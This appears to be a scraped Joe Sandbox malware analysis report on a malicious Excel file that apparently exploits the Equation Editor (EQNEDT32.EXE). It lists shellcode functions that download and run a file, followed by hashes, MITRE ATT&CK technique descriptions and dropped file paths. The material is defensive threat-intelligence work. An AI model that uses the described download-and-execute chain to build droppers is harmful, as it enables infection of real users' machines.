API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: c17fcd1cf7dd52c707961598001fbe9307a221727c523cbd792ccb3aa3d95fe1
Instruction ID: 2cbfd0870324320007afb9b70b5ca04d8eb3af27e3ea935175830c0dc6d3898b
Opcode Fuzzy Hash: c17fcd1cf7dd52c707961598001fbe9307a221727c523cbd792ccb3aa3d95fe1
Instruction Fuzzy Hash: 50F0C231604414BFC702DBA9DC40D9EBBB8EF46250B2540A6E800F7251D274FE01ABA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: EQNEDT32.EXEPID: 3596, Parent PID: 564COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	213
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 035F03C0 Relevance: 6.1, APIs: 4, Instructions: 89
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(035F03B2), ref: 035F03C0

Part of subcall function 035F03DA: URLDownloadToFileW.URLMON(00000000,035F03EB,?,00000000,00000000), ref: 035F0437
Part of subcall function 035F03DA: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F0475
Part of subcall function 035F03DA: ExitProcess.KERNEL32(00000000), ref: 035F048D

Memory Dump Source

Source File: 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_35f0000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileLibraryLoadProcessShell
String ID:
API String ID: 2508257586-0
Opcode ID: 0d2f53907d51cb28d93c57463c93cae89cd214bbc9b63121599eb68b3297a9d5
Instruction ID: a995b0cae59ebe390d5a4a8d56712e49fa0e29783981cfb5526f8a9c0c4e74c3
Opcode Fuzzy Hash: 0d2f53907d51cb28d93c57463c93cae89cd214bbc9b63121599eb68b3297a9d5
Instruction Fuzzy Hash: 5621599284D7C22FDB1397301C6EB65BF646F63104F5D89CEE5C20A4E3E2989401C766

Uniqueness

Uniqueness Score: -1.00%

Function 035F0342 Relevance: 4.6, APIs: 3, Instructions: 137
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,035F03EB,?,00000000,00000000), ref: 035F0437
ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F0475
ExitProcess.KERNEL32(00000000), ref: 035F048D

Memory Dump Source

Source File: 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_35f0000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: e1c00e028d7abc4718b8ca59f0e7e545718e9c2cc18295552816babf3ef35b43
Instruction ID: 5b2261ab2afe23202ce8112292d786dcb401c589e4cff9d5afb278705cfb8c70
Opcode Fuzzy Hash: e1c00e028d7abc4718b8ca59f0e7e545718e9c2cc18295552816babf3ef35b43
Instruction Fuzzy Hash: 4741A89680D7C12FDB12EB302D6EA55BF607B63100F5D89CEDAC64E4E3E2989101C767

Uniqueness

Uniqueness Score: -1.00%

Function 035F03DA Relevance: 4.6, APIs: 3, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_35f0000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: a91284640ddb484cc1e159123733978af5aff9974feb098c9e5f4e02341bcca2
Instruction ID: 4a30858d0a334e5444ff6c085ceeb7d431d427e57a1014aa01161432902f4181
Opcode Fuzzy Hash: a91284640ddb484cc1e159123733978af5aff9974feb098c9e5f4e02341bcca2
Instruction Fuzzy Hash: A721239694C7C22FDB139B301C6EB55BF642F63104F5D89CEE6C64A4E3E2A88440CB66

Uniqueness

Uniqueness Score: -1.00%

Function 035F0435 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,035F03EB,?,00000000,00000000), ref: 035F0437

Part of subcall function 035F044E: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F0475
Part of subcall function 035F044E: ExitProcess.KERNEL32(00000000), ref: 035F048D

Memory Dump Source

Source File: 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_35f0000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction ID: 8270f14f42b0e48e9c825fd04af8965b7f11a048a3a0f97d829c180a4676a1f3
Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction Fuzzy Hash: B2F0E26468CB412DEA51E7746C8EF6A6E64BF91604F1C4889B3464F4F3E5908400862A

Uniqueness

Uniqueness Score: -1.00%

Function 035F0463 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F0475

Part of subcall function 035F0488: ExitProcess.KERNEL32(00000000), ref: 035F048D

Memory Dump Source

Source File: 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_35f0000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: eaff0c484929867a2ea487090315282707c1ed768580a9109bb0d6fcfb6631b9
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: 09014E945847132CDB30F628AC1DFBBAB50BB51711FCC8C47AB91070F7D19480C38629

Uniqueness

Uniqueness Score: -1.00%

Function 035F044E Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_35f0000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction ID: f687842ab74e85d19ff32ee953fc9dd8845255b2481193b9d7a9e7057fad570b
Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction Fuzzy Hash: 7B014920688B023CE770E3286C8CFAEAA90BB91715F9C885AE7514B0F7D28484438629

Uniqueness

Uniqueness Score: -1.00%

Function 035F0488 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 035F048D

Memory Dump Source

Source File: 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_35f0000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #U4e5d#U6708#U58f0#U660e_40981677.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Exploits

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

(copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_1

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.2504

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt16.lst.2504

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\10E6DBD5.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DF8BD5C.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2FBBD4EF.emf

Windows Analysis Report
#U4e5d#U6708#U58f0#U660e_40981677.xls